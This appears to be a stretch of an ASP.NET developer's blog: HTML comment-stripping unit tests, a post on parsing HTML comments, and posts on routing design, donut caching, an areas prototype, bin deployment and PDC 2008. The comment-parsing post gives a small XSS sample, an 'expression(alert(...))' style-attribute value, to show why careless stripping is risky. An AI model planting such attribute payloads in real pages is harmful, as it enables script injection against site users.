public void Html_WithNonDashDashComment_ReturnsEmptyString() {
    string s = "<! this go bye bye>";
    Assert.AreEqual(string.Empty, Html.StripHtml(s));

public void Html_WithTwoConsecutiveComments_ReturnsEmptyString() {
    string s = "<!-- this go bye bye><!-- another comment>";
    Assert.AreEqual(string.Empty, Html.StripHtml(s));

public void Html_WithTextBeforeComment_ReturnsText() {
    string s = "Hello<!-- this go bye bye -->";
    Assert.AreEqual("Hello", Html.StripHtml(s));

public void Html_WithTextAfterComment_ReturnsText() {
    string s = "<!-- this go bye bye -->World";
    Assert.AreEqual("World", Html.StripHtml(s));

public void Html_WithAngleBracketsButNotHtml_ReturnsText() {
    string s = "<$)*(@&$(@*>";
    Assert.AreEqual(s, Html.StripHtml(s));

public void Html_WithCommentInterleavedWithText_ReturnsText() {
    string s = "Hello <!-- this go bye bye --> World <!--> This is fun";
    Assert.AreEqual("Hello  World  This is fun", Html.StripHtml(s));

public void Html_WithCommentBetweenNonTagButLooksLikeTag_DoesStripComment() {
    string s = @"<ç123 title=""<!bc def>"">";
    Assert.AreEqual(@"<ç123 title="""">", Html.StripHtml(s));

public void Html_WithTagClosedByStartComment_StripsFirstTag()
    //Note in Firefox, this renders: <!--foo>Test
    string html = "<foo<!--foo>Test";
    Assert.AreEqual("Test", HtmlHelper.RemoveHtml(html));

public void Html_WithTagClosedByProperComment_StripsFirstTag()
    string html = "<FOO<!-- FOO -->Test";
    Assert.AreEqual("Test", HtmlHelper.RemoveHtml(html));

public void Html_WithTagClosedByEmptyComment_StripsFirstTag()
    string html = "<foo<!>Test";
    Assert.AreEqual("Test", HtmlHelper.RemoveHtml(html));

What’s the moral of this story, apart from “Phil has way too much time on his hands?” In part, it’s that parsing HTML is fraught with peril. I wouldn’t be surprised if there are some cases here that I’m missing. If so, let me know. I used FireFox’s DOM Explorer to help verify the behavior I was seeing.

I think this is also another example of the challenges of software development in general along with the 80-20 rule. It’s really easy to write code that handles 80% of the cases. Most of the time, that’s good enough. But when it comes to security code, even 99% is not good enough, as hackers will find that 1% and exploit it.

In any case, I think I’m really done with this topic for now. I hope it was worthwhile. And as I said, I’ll post my code solution to this later. Let me know if you find missing test cases.

Technorati Tags: html,parsing

code, regex comments edit

A while ago I wrote a blog post about how painful it is to properly parse an email address. This post is kind of like that, except that this time, I take on HTML.

I’ve written about parsing HTML with a regular expression in the past and pointed out that it’s extremely tricky and probably not a good idea to use regular expressions in this case. In this post, I want to strip out HTML comments. Why?

I had some code that uses a regular expression to strip comments from HTML, but found one of those feared “pathological” cases in which it seems to never complete and pegs my CPU at 100% in the meanwhile. I figure I might as well look into trying a character by character approach to stripping HTML.

It sounds easy at first, and my first attempt was roughly 34 lines of procedural style code. But then I started digging into the edge cases. Take a look at this:

<p title="<!-- this is a comment-->">Test 1</p>

Should I strip that comment within the attribute value or not? Technically, this isn’t valid HTML since the first angle bracket within the attribute value should be encoded. However, the three browsers I checked (IE 8, FF3, Google Chrome) all honor this markup and render the following.


Notice that when I put the mouse over “Test 1” and the browser rendered the value of the title attribute as a tooltip. That’s not even the funkiest case. Check this bit out in which my comment is an unquoted attribute value. Ugly!

<p title=<!this-comment>Test 2</p>

Still, the browsers dutifully render it:


At this point, It might seem like I’m spending too much time worrying about crazy edge cases, which is probably true. Should I simply strip these comments even if they happen to be within attribute values because they’re technically invalid. However, it worries me a bit to impose a different behavior than the browser does.

Just thinking out loud here, but what if the user can specify a style attribute (bad idea) for an element and they enter:

<!>color: expression(alert('test'))

Which fully rendered yields: <p style="<!>color: expression(alert('test'))">

If we strip out the comment, then suddenly, the style attribute might lend itself to an attribute based XSS attack.

I tried this on the three browsers I mentioned and nothing bad happened, so maybe it’s a non issue. But I figured it would probably make sense to go ahead and strip the HTML comments in the cases that the browser. So I decided to not strip any comments within an HTML tag, which means I have to identify HTML tags. That starts to get a bit ugly as <foo > is assumed to be an HTML tag and not displayed while <çoo /> is just content and displayed.

Before I show the code, I should clarify something. I’ve been a bit imprecise here. Technically, a comment starts with a – character, but I’ve referred to markup such as <!> as being a comment. Technically it’s not, but it behaves like one in the sense that the browser DOM recognizes it as such. With HTML you can have multiple comments between the <! and the > delimiters according to section 3.2.5 of RFC 1866.


   To include comments in an HTML document, use a comment declaration. A
   comment declaration consists of `<!' followed by zero or more
   comments followed by `>'. Each comment starts with `--' and includes
   all text up to and including the next occurrence of `--'. In a
   comment declaration, white space is allowed after each comment, but
   not before the first comment.  The entire comment declaration is

      NOTE - Some historical HTML implementations incorrectly consider
      any `>' character to be the termination of a comment.

   For example:

    <TITLE>HTML Comment Example</TITLE>
    <!-- Id: html-sgml.sgm,v 1.5 1995/05/26 21:29:50 connolly Exp  -->
    <!-- another -- -- comment -->
    <p> <!- not a comment, just regular old data characters ->

The code I wrote today was straight up old school procedural code with no attempt to make it modular, maintainable, object oriented, etc… I posted it to here with the unit tests I defined.

In the end, I might not use this code as I realized later that what I really should be doing in the particular scenario I have is simply stripping all HTML tags and comments. In any case, I hope to never have to parse HTML again. ;)

humor, personal comments edit

During my talk at the PDC, I heeded Hanselman’s call to action and decided to veer away from the Northwind “Permademo” and build something different.

In the middle of the talk, I unveiled that I was going to build a competitor to StackOverflow which I would call HaackOverflow. This was all news to Jeff as he hadn’t seen the demo until that point.

The demo walked through some basics of building a standards based ASP.NET MVC application, and sprinkled in a bit of AJAX. At the very end, I swapped out the site.css file and added an image and changed the site from the drab default blue template to something that looked similar in spirit to StackOverflow.


If you haven’t seen the talk yet, you can watch it on Channel9. Also, the links to my slides and the source code are also available on that page.

I only mention it now because Jeff recently Twittered a link to the Reddit Remix of the StackOverflow logo, which reminded of my own hack job on their logo.

Technorati Tags: stackoverflow,pdc08, code, mvc comments edit

Usability and Discoverability (also referred to as Learnability) are often confused with one another, but they really are distinct concepts. In Joel Spolsky’s wonderful User Interface Design for Programmers (go read it!), Joel provides an metaphor to highlight the difference.

It takes several weeks to learn how to drive a car. For the first few hours behind the wheel, the average teenager will swerve around like crazy. They will pitch, weave, lurch, and sway. If the car has a stick shift they will stall the engine in the middle of busy intersections in a truly terrifying fashion. \ If you did a usability test of cars, you would be forced to conclude that they are simply unusable.


This is a crucial distinction. When you sit somebody down in a typical usability test, you’re really testing how learnable your interface is, not how usable it is. Learnability is important, but it’s not everything. Learnable user interfaces may be extremely cumbersome to experienced users. If you make people walk through a fifteen-step wizard to print, people will be pleased the first time, less pleased the second time, and downright ornery by the fifth time they go through your rigamarole.

Sometimes all you care about is learnability: for example, if you expect to have only occasional users. An information kiosk at a tourist attraction is a good example; almost everybody who uses your interface will use it exactly once, so learnability is much more important than usability.

Rick Osborne in his post, Usability vs Discoverability, also covers this distinction, while Scott Berkun points out in his post on The Myth of Discoverability that you can’t have everything be discoverable.

These are all exmaples of the principle that there is no such thing as a perfect design. Design always consists of trade-offs.

Let’s look at an example using a specific feature of ASP.NET Routing that illustrates this trade-off. One of the things you can do with routes is specify constraints for the various URL parameters via the Constraints property of the Route class.

The type of this property is RouteValueDictionary which contains string keys mapped to object values. Note that by having the values of this dictionary be of type object, the value type isn’t very descriptive of what the value should be. This hurts learnability, but let’s dig into why we did it this way.

One of the ways you can specify the value of a constraint is via a regular expression string like so:

Route route = new Route("{foo}/{bar}", new MyRouteHandler());
route.Constraints = 
  new RouteValueDictionary {{"foo", "abc.*"}, {"bar", "\w{4}"}};

This route specifies that the foo segment of the URL must start with “abc” and that the bar segment must be four characters long. Pretty dumb, yeah, but it’s just an example to get the point across.

We figure that in 99.9% of the cases, developers will use regular expression constraints. However, there are several cases we identified in which a regular expression string isn’t really appropriate, such as constraining the HTTP Method. We could have hard coded the special case, which we originally did, but decided to make this extensible because more cases started cropping up that were difficult to handle. This is when we introduced the IRouteConstraint interface.

At this point, we had a decision to make. We could have changed the the type of the Constraints property to something where the values are of type IRouteConstraint rather than object in order to aid discoverability. Doing this would require that we then implement and include a RegexConstraint along with an HttpMethodConstraint.

Thus the above code would look like:

Route route = new Route("{foo}/{bar}", new MyRouteHandler());
route.Constraints = 
  new RouteConstraintDictionary {{"foo", new RegexConstraint("abc.*")}, 
    {"bar", new RegexConstraint("\w{4}")}};

That’s definitely more discoverable, but at the cost of usability in the general case (note that I didn’t even include other properties of a route you would typically configure). For most users, who stick to simple regular expression constraints, we’ve just made the API more cumbersome to use.

It would’ve been really cool if we could monkey patch an implicit conversion from string to RegexConstraint as that would have made this much more usable. Unfortunately, that’s not an option.

So we made the call to favor usability in this one case at the expense of discoverability, and added the bit of hidden magic that if the value of an item in the constraints dictionary is a string, we treat it as a regular expression. But if the value is an instance of a type that implements IRouteConstraint, we’d call the Match method on it.

It’s not quite as discoverable the first time, but after you do it once, you’ll never forget it and it’s much easier to use every other time you use it.

Making Routing with MVC More Usable

Keep in mind that Routing is a separate feature from ASP.NET MVC. So what I’ve covered applies specifically to Routing.

When we looked at how Routing was used in MVC, we realized we had room for improving the usability. Pretty much every time you define a route, the route handler you’ll use is MvcRouteHandler it was odd to require users to always specify that for every route. Not only that, but once you got used to routing, you’d like a shorthand for defining defaults and constraints without having to go through the full collection initializer syntax for RouteValueDictionary.

This is when we created the set of MapRoute extension methods specific to ASP.NET MVC to provide a façade for defining routes. Note that if you prefer the more explicit approach, we did not remove the RouteCollection’s Add method. We merely layered on the MapRoute extensions to RouteCollection to make defining routes simpler. Again, a trade-off in that the arguments to the MapRoute methods are not as discoverable as using the explicit approach, but they are usable once you understand how they work.

Addressing Criticisms

We spent a lot of time thinking about these design decisions and trade-offs, but it goes without saying that it will invite criticisms. Fortunately, part of my job description is to have a thick skin. ;)

In part, by favoring usability in this case, we’ve added a bit of friction for those who are just starting out with ASP.NET MVC, just like in Joel’s example of the teenager learning to drive. However, after multiple uses, it becomes second nature, which to me signifies that it is usable. Rather than a flaw in our API, I see this more as a deficiency in our documentation and Intellisense support, but we’re working on that. This is an intentional trade-off we made based on feedback from people building multiple applications.

But I understand it won’t please everyone. What would be interesting for me to hear is whether these usability enhancements work. After you struggle to define constraints the first time, was it a breeze the next time and the time after that, especially when compared to the alternative? mvc,, code comments edit

UPDATE: Due to differences in the way that ASP.NET MVC 2 processes request, data within the substitution block can be cached when it shouldn’t be. Substitution caching for ASP.NET MVC is not supported and has been removed from our ASP.NET MVC Futures project.

This technique is NOT RECOMMENDED for ASP.NET MVC 2.

With ASP.NET MVC, you can easily cache the output of an action by using the OutputCacheAttribute like so.

[OutputCache(Duration=60, VaryByParam="None")]
public ActionResult CacheDemo() {
  return View();

One of the problems with this approach is that it is an all or nothing approach. What if you want a section of the view to not be cached?

mmmm-doughnut Well ASP.NET does include a <asp:Substitution …/> control which allows you to specify a method in your Page class that gets called every time the page is requested. ScottGu wrote about this way back when in his post on Donut Caching.

However, this doesn’t seem very MVC-ish, as pointed out by Maarten Balliauw in this post in which he implements his own means for adding output cache substitution.

However, it turns out that the Substitution control I mentioned earlier makes use of an existing API that’s already publicly available in ASP.NET. The HttpResponse class has a WriteSubstitution method which accepts an HttpResponseSubstitutionCallback delegate. The method you supply is given an HttpContext instance and allows you to return a string which is displayed in place of the substitution point.

I thought it’d be interesting to create an Html helper which makes use of this API, but supplies an HttpContextBase instead of an HttpContext. Here’s the source code for the helper and delegate.

public delegate string MvcCacheCallback(HttpContextBase context);

public static object Substitute(this HtmlHelper html, MvcCacheCallback cb) {
        c => HttpUtility.HtmlEncode(
            cb(new HttpContextWrapper(c))
    return null;

The reason this method returns a null object is to make the usage of it seem natural. Let me show you the usage and you’ll see what I mean. Referring back to the controller code at the beginning of this post, imagine you have the following markup in your view.

<!-- this is cached -->
<%= DateTime.Now %>

<!-- and this is not -->
<%= Html.Substitute(c => DateTime.Now.ToString()) %>

On the first request to this action, the entire page is rendered dynamically and you’ll see both dates match. But when you refresh, only the lambda expression is called and is used to replace that portion of the cached view.

I have to thank Dmitry, our PUM and the first developer on ASP.NET way back in the day who pointed out this little known API method to me. :)

We will be looking into hopefully including this in v1 of ASP.NET MVC, but I make no guarantees., mvc comments edit

UPDATE: I updated the prototype to work against the ASP.NET MVC 1.0 RTM. Keep in mind, this is *NOT* a backport of the the ASP.NET MVC 2 feature so there may be some differences.

A question that this. The funny part with things like this is that I’ve probably spent as much time writing this blog post as I did working on the prototype, if not more!

The scenario that areas address is being able to partition your application into discrete areas of functionality. It helps make managing a large application more manageable and allows for creating distinct applets that you can drop into an application.

For example, suppose I want to drop in a blogs subfolder, complete with its own controllers and views, along with a forums subfolder with its own controllers and views, into a default project. The end result might look like the following screenshot (area folders highlighted).


Notice that these folders have their own Views, Content, and Controllers directories. This is slightly similar to a solution proposed by Steve Sanderson, but he ran into a few problems we’d like to resolve.

  • URL generation doesn’t take namespaces into consideration when generating a URL. We want to be able to easily generate URLs to other areas.
  • When you are within one area, and you call Html.ActionLink to link to another action in the same area, you’d like to not have to specify the area name. You’d also like to not be forced to specify a route name.
  • You still want to be able to link to another area by specifying the area name. And, you want to be able to have controllers of the same name within the same area.
  • You also want to be able to link to the “root” area, aka the default HomeController that comes with the project template that is not located in an area.

The prototype I put together resolves these problems by adopting and enforcing a few constraints when it comes to areas.

  • The area portion comes first in the URL.
  • Controller namespaces must have a specific format that includes the area name in the namespace.
  • The root controllers that are not in any area have a default area name of “root”.
  • When resolving a View/Partial View for a controller within an area, we search in the area’s Views folder first. If not found there, we then look in the root Views folder.

Overridable Templating

This last point bears a bit of elaboration. It is a technique that came about from some experimentation I did on a potential new way of skinning for Subtext.

In the Blogs area, I have a partial view called LoginUserControl.ascx. In the Forums area, I don’t have this partial view. Thus when you go to the Forums area, it falls back to the root Views directory in order to render this partial view. But in the Blogs area, it uses the one specified in the area. This is a convenient way of implementing overridable templating and is reminiscent of ASP.NET Dynamic Data.

If you run the sample, you’ll see what I mean. When you hit the Blogs area, the login link is replaced by some text saying “Blogs don’t need no stinking login”, but the Forums area still has the login link.

Note that all of these conventions are specifically for this prototype. It would be very easy to relax these constraints to fit you’re own way of doing things. I just wanted to show how this could be done using the current ASP.NET MVC bits.

Registering Routes

The first thing we do is call two new extension methods I wrote to register routes for the areas. This call is made in the RegisterRoutes method in Global.asax.cs.

    new[]{ "Blogs", "Forums" });

    new { controller = "Home", action = "Index", id = "" });

The first argument to the MapAreas method is the Routing URL pattern you know and love. We will prepend an area to that URL. The second argument is a root namespace. By convention, we will append “.Areas.AreaName.Controllers” to the provided root namespace and use that as the namespace in which we lookup controller types.

For example, suppose you have a root namespace of MyRootNamespace. If you have a HomeController class within the Blogs area, its full type name would need to be


Again, this is a convention I made up, it could be easily changed. The nice thing about following this convention is you don’t really have to think about namespaces if you follow the directory structure I outlined. You just focus on your areas.

The last argument to the method is a string array of the “areas” in your application. Perhaps I could derive this automatically by examining the file structure, but I put together this prototype in the morning and didn’t think of that till I was writing this blog post. ;)

The second method, MapRootArea, is exactly the same as MapRoute, except it adds a default of area = “root” to the defaults dictionary.

Registering the ViewEngine

I also wrote a very simple custom view engine that knows how to look in the Areas folder first, before looking in the root Views folder when searching for a view or partial view.

I wrote this in such a way that it replaces the default view engine. To make this switch, I added the following in Global.asax.cs in the Application_Start method.

ViewEngines.Engines.Add(new AreaViewEngine());

The code for the AreaViewEngine is fairly simple. It inherits from WebFormViewEngine and looks in the appropriate Areas first for a given view or partial view before looking in the default location. The way I accomplished this was by adding some catch-all location formats such as ~/{0}.aspx and formatted those myself in the code.

If that last sentence meant nothing to you, don’t worry. It’s an implementation detail of the view engine.

Linking to Areas

In the root view, I have the following markup to link to the HomeController and Index action of each area.

<%= Html.ActionLink("Blog Home", "Index", new { area="Blogs" } )%>
<%= Html.ActionLink("Forums Home", "Index", new { area="Forums" } )%>

However, within an area, I don’t have to specify the area when linking to another action within the same area. It chooses the current area by default. For example, here’s the code to render a link to the Blogs area’s Posts action.

<%= Html.ActionLink("Blogs Posts", "Posts") %>

That’s no different than if you weren’t doing areas. Of course, if I want to link to the forums area, I need to specify that. Also, if I want to link to an action in the root, I need to specify that as well.

<%= Html.ActionLink("Forums", "Index", "new {area="forums"}") %>
<%= Html.ActionLink("Root Home", "Index", "new {area="root"}") %>

As you click around in the sample, you’ll notice that I changed the background color when in a different area to highlight that fact.

Next Step, Nested Areas

One thing my prototype doesn’t address are nested areas. This is something I’ll try to tackle next. I’m going to see if I can clean up the implementation later and possibly get them into the MVC Futures project. This is just some early playing around I did on my own so do let me know if you have better ideas for improving this.

Download the Sample mvc, comments edit

With the release of ASP.NET MVC Beta, the assemblies distributed with ASP.NET MVC are automatically installed into the GAC.

  • System.Web.Mvc
  • System.Web.Routing
  • System.Web.Abstractions

While developing an application locally, this isn’t a problem. But when you are ready to deploy your application to a hosting provider, this might well be a problem if the hoster does not have the ASP.NET MVC assemblies installed in the GAC.

Fortunately, ASP.NET MVC is still bin-deployable. If your hosting provider has ASP.NET 3.5 SP1 installed, then you’ll only need to include the MVC DLL. If your hosting provider is still on ASP.NET 3.5, then you’ll need to deploy all three. It turns out that it’s really easy to do so.

Also, ASP.NET MVC runs in Medium Trust, so it should work with most hosting providers’ Medium Trust policies. It’s always possible that a hosting provider customizes their Medium Trust policy to be draconian.

What I like to do is use the Publish feature of Visual Studio to publish to a local directory and then upload the files to my hosting provider. If your hosting provider supports FTP, you can often skip this intermediate step and publish directly to the FTP site.

The first thing I do in preparation is to go to my MVC web application project and expand the References node in the project tree. Select the aforementioned three assemblies and in the Properties dialog, set Copy Local to True.


Now just right click on your application and select Publish.


This brings up the following Publish wizard.


Notice that in this example, I selected a local directory. When I hit Publish, all the files needed to deploy my app are available in the directory I chose, including the assemblies that were in the GAC.


Now I am ready to XCOPY the application to my host, but before I do that, I really should test the application as a bin deployed app to be on the safe side.

Ideally, I would deploy this to some staging server, or a virtual machine that does not have ASP.NET MVC installed. Otherwise, I’m forced to uninstall ASP.NET MVC on the current machine and then test the application.

You might be wondering, as I did, why I can’t just use gacutil to temporarily unregister the assembly, test the app, then use it again to register the assembly. Because it was installed using an MSI, Windows won’t let you unregister it. Here’s a command prompt window that shows what I got when I tried.


Notice that it says that “assembly is required by one or more applications”. In general, there shouldn’t be any difference between running your application with MVC gac’d and it ungac’d. But I wouldn’t trust me saying this, I’d test it out to be sure.

code, personal comments edit

Whew! I’ve finally found a bit of time to write about my impressions of the PDC 2008 conference. If you’re looking for insightful commentary and a “What does this all mean” post, you’ve come to the wrong place. There are plenty of others providing that sort of commentary. I’ll just string together some random impressions and pics from my perspective.

crowd before the MVC
talk First of all, one thing I’m very impressed with is that all sessions are viewable online almost immediately afterwards, with full video of the slides and the presenter. Now I understand why they asked me not to pace too much. To see my presentation, visit its Channel9 Page. Note that my slides and sample code are now up there.

john-lam-and-me I hade a great time delivering this talk (see photo of the room before I started above) and as I wrote before, I uncovered a new presentation tip.

There were 1150 attendees at the talk. If you saw my talk, be sure to submit an eval as the last time I checked, only 95 people did.

mr-open-spacesOf course the best part of the conference (besides excessive amounts of RockBand) is hanging out with the people! I spent time at the ASP.NET lounge at various points in the conference answering a boatload of questions about ASP.NET MVC. This has inspired a nice backlog of posts I should write.

I also spent a lot of time in the Open Spaces area enjoying the geekout sessions. Especially Dustin Campbell’s session on currying, closures, etc… which turned into a discussion of functional languages as I was showing up.

los-tres-amigosOf course, the various parties were great too. I don’t have pictures of the Universal Studios trip, unfortunately, but I will say the Simpson’s ride was awesome. I only brought my camera to the Dev After Dark party, on Wednesday night, which is where most of these are from.

As you can see here, Jeff Atwood, Miguel De Icaza, and myself having a good time at the JLounge. We tried to get it renamed to NLounge, but to no avail.

mike-and-the-dude One of the highlights of the evening was running into my coworker’s hero, The Dude from The Big Lebowski holding a white russian!

Ok, it’s actually Ted Neward graciously posing with my drink as this was probably the 2048^th^ time he heard this joke.

OG-microsoft And wouldn’t you know it, but the Microsofties from the early days showed up to the party. There’s young Bill in the lower left corner.

It was very interesting to meet so many people in person who I’ve “met” before via comments in our forums, on my blog, Twitter, etc…

Especially in the cases where a person in the past reported a bug in a forum, and then at PDC had the opportunity to explain it to me so that we both understood the issue more clearly. In any case, I’m hopefully done travelling for the year.

personal, code comments edit

In my last post, I joked that the reason that someone gave me all 1s in my talk was a misunderstanding of the evaluation form. In truth, I just assumed that someone out there really didn’t like what I was showing and that’s totally fine. It was something I found funny and I didn’t really care too much.

But I received a message from someone that they tried to evaluate the session from the conference hall, but the evaluation form was really screwy on their iPhone. For example, here’s how it’s supposed to look in IE.


I checked it out with Google Chrome which uses WebKit, the same rendering engine that Safari, and thus the iPhone, uses.

Here it is (click to see full size).


Notice anything different? :)

The good news here is that nothing really at stake here for me, as speaking is a perk of my job, not a requirement. It doesn’t affect my reviews. I’d bet this form has been in use for years and was built long before the iPhone.

However, if we ever start deciding elections online, this highlights one of the subtle design issues the designers of such a ballot would need to address.

It’s not just an issue of testing for the current crop of browsers, it’s also about anticipating what future browsers might do.

Such a form would really need to have simple semantic standards based markup and be rendered in such a way that if CSS were disabled, submitting the form would still reflect the voter’s intention.

For example, it may be hard to anticipate every possible browser rendering of a form. In this case, one fix would be to change the label for the radio buttons to reflect the intention. Thus rather than the number “1” the radio button label would be “1 – Very Dissatisfied”. Sure, it repeats the column information, but no matter where the radio buttons are displayed, it reflects the voter’s intention.

In any case, I think the funny part of this whole thing is when I mentioned this one evaluation score, several people I know all laid claim to being the one who hated my talk. They all want to take credit for hating on my talk, without going through all the trouble of actually submitting bad scores. ;)

If you were at the conference and saw my talk, be sure to evaluate it. And do be kind. :)

UPDATE: Be sure to read John Lam’s account of the PDC as well. He has some great suggestions for conference organizers to improve the evaluation process.

personal comments edit

Before giving a presentation, I review Scott Hanselman’s top 11 presentation tips. Well I have a twelfth tip that Scott needs to add to his list, and he’ll vouch for this.

rockband A couple of hours before Jeff and I gave the ASP.NET MVC presentation (the video is now posted!), we played some RockBand in the Big Room (exhibition area).

Playing Eye of the Tiger before a big talk has a great way of both pumping you up and loosening you up at the same time. When I ran into Scott and told him this tip, he said he did the very same thing, playing Eye of the Tiger on RockBand before his talk. In his case, I think he played for two hours.

In any case, I felt like my talk went well. Jeff was entertaining as always and provided that taste of real-world relevance to what we’re doing with ASP.NET MVC. I particularly liked it when he remoted into his live server and showed the audience how his 8 CPU server was doing via task manager.

In any case, if you watched my talk, be sure to submit evals (higher number means better. Whomever gave me all 1s, that’s just mean! ;). I look forward to hearing your feedback. I’d love to be able to show people that there’s a demand for this type of framework and development model (transparency, source releases, etc…) and maybe we can get more than one MVC talk next time. I think it’s time I do a really advanced one. :)

Technorati Tags: pdc2008,aspnetmvc,presentation,pdc